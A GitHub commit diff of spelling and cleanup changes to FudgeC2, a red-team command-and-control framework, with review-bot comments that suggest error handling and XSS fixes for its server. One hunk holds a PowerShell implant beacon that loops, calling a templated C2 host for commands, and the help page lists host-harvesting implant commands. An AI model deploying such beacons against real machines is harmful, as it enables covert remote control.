Version 0.2 complete - Minor commit with spelling + typo changes
Ziconius committed Jun 10, 2019
1 parent 14c2830 commit 7791952
Showing 9 changed files with 29 additions and 30 deletions.
1 change: 0 additions & 1 deletion FudgeC2/Controller.py
@@ -41,5 +41,4 @@ def start_controller(listener_management):
while 1:
# Hold the application threads open
time.sleep(15)
# LM.get_active_listeners()
pass
12 changes: 5 additions & 7 deletions FudgeC2/Implant/Implant.py
@@ -3,7 +3,7 @@

class ImplantSingleton:
class __OnlyOne:
# -- The Implant class is sole class responible for controlling data to and from implants.
# -- The Implant class is sole class responsible for controlling data to and from implants.
# -- it manages these interaction across all types of implants and communication protocols.

def AddCommand(self, User, cid, UniqueImplantKey,Command):
@@ -39,12 +39,10 @@ def IssueCommand(self,UIK=0, c2_protocol=None):

# -- Used by Implant - Logs command responses from infected machines.
def CommandResponse(self,result, c2_protocol=None):
aa = result.split("::", 1) # Remove the identifying prefix
generated_implant_data = db.Get_GeneratedImplantDataFromUIK(aa[0])
db.Register_ImplantResponse(generated_implant_data[0]['cid'],aa[0],aa[1], c2_protocol)
# -- Legacy Format Below: To remove -- #
# self.CommandOutput.append(result)
return 0
uik_and_response_data = result.split("::", 1) # Remove the identifying prefix
generated_implant_data = db.Get_GeneratedImplantDataFromUIK(uik_and_response_data[0])
db.Register_ImplantResponse(generated_implant_data[0]['cid'],uik_and_response_data[0],uik_and_response_data[1], c2_protocol)


# -- Used by webapp.
def Get_CommandResult(self,cid):
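Review bot: `CommandResponse` indexes `uik_and_response_data[1]` and `generated_implant_data[0]['cid']` without checking either, and `result` is data received from remote hosts according to the comment above the method. A value with no `::` separator raises `IndexError`, and a UIK the database does not recognise presumably fails on the `[0]` lookup (the return shape of `Get_GeneratedImplantDataFromUIK` is not visible here). Splitting with `uik, sep, response = result.partition("::")` and returning early when `sep` is empty or the lookup comes back empty would keep one malformed message from raising in the listener. The commit also appears to drop `return 0`, so the method now returns `None`; callers outside this hunk that test the old value should be checked.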
5 changes: 2 additions & 3 deletions FudgeC2/Implant/ImplantGeneratorDecorators.py
@@ -46,13 +46,12 @@ class ImplantGenerator():
'''
text = '''
$sleep={{ beacon }}
$wc = New-Object System.Net.WebClient
# $wc = New-Object System.Net.WebClient
while($true){
start-sleep($sleep)
$headers = @{}
$headers.Add("X-Implant","{{ uii }}")
try {
#$LoginResponse = $wc.
$LoginResponse = Invoke-WebRequest '{{ http }}://{{url}}:{{port}}/index' -Headers $headers -Body $Body -Method 'POST'
}
catch {
@@ -93,7 +92,7 @@ def randomise_jinja_variables(self, JinjaRandomisedArgs):
print("Randomising Jinja2 Variables")
# TODO: Complete for level 0 obfuscation
# -- Iterate over all variables contained within self.JinjaRandomisedArgs and replace the value
# -- ensure that all variable are unqiue.
# -- ensure that all variable values are unqiue.
return JinjaRandomisedArgs

# -- Public Functions
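Review bot: The reworded comment in `randomise_jinja_variables` still misspells "unique" as "unqiue", on a commit whose purpose is spelling fixes; it should read `# -- ensure that all variable values are unique.`. The method also keeps its `print("Randomising Jinja2 Variables")` call while this commit removes similar debug prints from `ImplantManagement.py`, so for consistency it could be dropped or routed through logging.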
8 changes: 3 additions & 5 deletions FudgeC2/ServerApp/modules/ImplantManagement.py
@@ -11,7 +11,6 @@ def _form_validated_obfucation_level_(self, form):
for x in form:
if "obfus" in x:
a = x.split("-")
print("ll", a[1])
# -- returning first value, we should only receive a single entry.
try:
return int(a[1])
@@ -105,16 +104,15 @@ def CreateNewImplant(self,cid,form, user):
if "comms_binary" in form :
comms_binary = 1
if comms_binary == 0 and comms_dns == 0 and comms_http == 0 and comms_https == 0:
raise ValueError('No communitcation channel selected. ')
raise ValueError('No communication channel selected.')
if comms_http ==1 and comms_https == 1:
raise ValueError("Please select either HTTP or HTTPS. Multiprotocol is not yet supported.")
raise ValueError("Please select either HTTP or HTTPS. Multi-protocol is not yet supported.")
a = self.db.Add_Implant(cid, title ,url,port,beacon,initial_delay,comms_http,comms_https,comms_dns,comms_binary,description,obfuscation_level)
if a == True:
return True, "Implant created."
else:
raise ValueError("Error creating entry. Ensure filename is unique")
raise ValueError("Error creating entry. Ensure implant title is unique")
except Exception as e:
print("NewImplant: ",e)
# -- returning page with generic Error --#
return False, e

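Review bot: With `print("NewImplant: ",e)` removed, the `except Exception as e` block at the end of `CreateNewImplant` no longer records the failure anywhere, and `return False, e` hands the raw exception object to the caller although the comment above it promises a generic error. Any non-validation failure, for example one raised inside `self.db.Add_Implant`, would then reach the web user verbatim (assuming the caller renders the second tuple element) and leave no trace on the server. Catching `ValueError` separately keeps the user-facing messages this commit just corrected, while everything else is logged server-side and replaced by a fixed string. The `try:` that this handler closes starts outside the hunk, and the sketch below needs `import logging` at the top of the module.

```python
# … unchanged: form parsing, validation and the Add_Implant call …
except ValueError as e:
    # Validation messages raised above are written for the user.
    return False, e
except Exception:
    # Unexpected failure: keep the detail in the server log only.
    logging.getLogger(__name__).exception("CreateNewImplant failed")
    return False, "Error creating implant."
```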
2 changes: 1 addition & 1 deletion FudgeC2/ServerApp/templates/BaseNavbar.html
@@ -34,7 +34,7 @@
</div>
<ul class="nav navbar-nav navbar-right">
<li class="pr-3">
<a class="nav-link" href="{{ url_for('HelpPage') }}">Help <i class="fas fa-question-circle"></i></a>
<a class="nav-link" href="{{ url_for('HelpPage') }}">Documentation <i class="fas fa-question-circle"></i></a>
</li>
</ul>
<ul class="nav navbar-nav navbar-right">
18 changes: 11 additions & 7 deletions FudgeC2/ServerApp/templates/HelpPage.html
@@ -8,23 +8,24 @@
</div>
<div class="col-md-10 m-0 p-2">
<div class="p-3 m-0 rounded iplm ">
<h1>Help</h1>

<h2>Configuration</h2>
<h1>FudgeC2 Documentation</h1>
<p class="text-warning">This documentation contain incomplete information, as well as documentation on unimplemented features.</p>
<h3>Configuration</h3>
<h4>User Account</h4>
<h5>Add user</h5>
<p>Adding a user account can be done by any admin in the global settings:
<a href="/settings">/settings</a> </p>

<h5>Configure campaign users</h5>
<p>http://fudge.moozle.wtf:5001/1/settings</p>
<p>This can be found within the campaign settings, under <code>/[campaign id]/settings</code> </p>
<h5>Password Reset</h5>
<p>Global settings <b>IN DEVELOPMENT</b></p>
<p>Resetting a users password can be achieve in the global settings. This will generated a one-time password, which the user will change on first logon. (Not yet implemented)<br>
<a href="/settings">/settings</a> </p>

<br>
<h4>Listeners</h4>
<p>
Listeners are the device which catch communication from implants, and issue commands. Configuring listeners requires admin providlegs.</p>
Listeners are the device which catch communication from implants, and issue commands. Configuring listeners requires admin privileges.</p>

<p class="text-danger">Caution: When stopping a listener it will impact all implants, not just those from your own campaign. Communicate to your wider teams.</p>

@@ -33,13 +34,16 @@ <h4>Listeners</h4>
<p>Once a listener has been set up for a given protocol and port it does not need to be done against for a separate campaign. All campaign which used an identical implant configuration will use this listener.</p>

<p>Common examples of shared listeners are HTTP on port 80, or HTTPS on port 443. Once a listener has been set up, all implant, for all campaign can use it (and once stopped, it will stop for all).</p>
<p>When creating listeners you have the option to auto-start a listener, this will enable the listener upon creation.</p>
<p>Listeners can be configured here:<br>
<a href="/listener">/listeners</a></p>


<h2>Built in commands</h2>
<p>Active implants have a number of builtin commands designed to perform common actions, and harvest host information.<br>
below is the list of current implant commands:</p>
<code>:: sys_info</code>
<p> Sys_info: Collects username and hostname</p>
<p> Sys_info: Collects username and hostname. (Not yet implemented)</p>
<code>:: network_info</code>
<p>Collects network information including domain, hostname, ip address, active network services.</p>

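Review bot: The new listener link reads `<a href="/listener">/listeners</a>`, so the target and the visible path disagree and one of them is presumably wrong; which route the app serves is not visible here. The `/settings` links on the page are hard-coded as well, whereas `BaseNavbar.html` in this same commit builds its link with `{{ url_for('HelpPage') }}`, and doing the same here would keep the page correct if routes change. Since this commit is a spelling pass, note that the added text carries new slips: "This documentation contain", "a users password can be achieve" and "This will generated".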
2 changes: 1 addition & 1 deletion FudgeC2/ServerApp/templates/implant_input.html
@@ -93,7 +93,7 @@
// console.log(response[element]);
tmp_text = response[element].log_entry
response_data = tmp_text.replace(new RegExp('\r?\n','g'), '<br />');
GG = "<div><p>IID: "+response[element].title+"<br>Time: "+d+"<br>Rsp: <code>"+response_data+"</code></p></div><hr>";
GG = "<div><p>ID: "+response[element].title+"<br>Time: "+d+"<br>Resp: <code>"+response_data+"</code></p></div><hr>";
WP = document.getElementById('Response').innerHTML;
// alert(WP);
document.getElementById('Response').innerHTML = GG + WP;
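Review bot: The line that builds `GG` concatenates `response[element].title` and `response_data` straight into markup and then assigns the result to `innerHTML`, so anything that looks like HTML in a logged response is parsed by the operator's browser rather than displayed. `log_entry` appears to hold output returned by remote hosts, which makes it untrusted input to this page. Building the entry with `document.createElement` and setting the values through `textContent`, e.g. `code.textContent = response[element].log_entry;` with `code.style.whiteSpace = "pre-wrap";` in place of the `<br />` substitution, would render the text literally. The enclosing callback starts and ends outside the hunk.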
2 changes: 1 addition & 1 deletion FudgeC2/ServerApp/templates/listeners/listeners.html
@@ -21,7 +21,7 @@
</div>
{% endif %}
<div><h1>Listeners</h1><p>Listeners can be configured from here, please consider other campaigns before any listeners is terminated.</p></div>
<div><p class="text-danger">Note: Customised Listeners are currently in development.</p></div>
<div><p class="text-danger">Dev note: Listener configuration is currently in development, users can only <b>start</b> listeners.</p></div>
<h5>Configured Listeners:</h5>

<p>
9 changes: 5 additions & 4 deletions README.md
@@ -164,7 +164,7 @@ Release 0.2 _(Human Grunt)_

##### Implant

- [ ] Add further work on implant obfuscation levels/configuration.

- [x] Add implant special tags formatted: `::cmd::`
- [x] Create further staging options (docm)
- [x] Improve format of returning data.
@@ -176,7 +176,7 @@ Release 0.2 _(Human Grunt)_
##### Controller
- [x] Check for `fudge.db` in the working dir, if not configure new setup.
- [x] Code refactor Controller to boot server & listener
- [ ] Clean code for version release
- [x] Clean code for version release - partial


---
@@ -191,10 +191,10 @@ Release 0.2 _(Human Grunt)_
##### Implant
- [ ] Add persistence mechanism
- [ ] Add .docx macro
- [ ] Improve obfuscation
- [ ] Add further work on implant obfuscation levels/configuration.

##### Controller
- [ ] Restructure how listeners are configured and launched. This piece of work will be staged over serveral releases.
- [ ] Restructure how listeners are configured and launched. This piece of work will be staged over several releases.

##### Campaign Viewer
- [ ] Author separate viewer mechanisms for the client/blue team
@@ -208,6 +208,7 @@ Release 0.2 _(Human Grunt)_
- [ ] Refactor Webapp flask into Flask Blueprints.
- [ ] Add filter for implants on implant page to reduce noise.



##### Implant
- [ ] Create DNS comms channel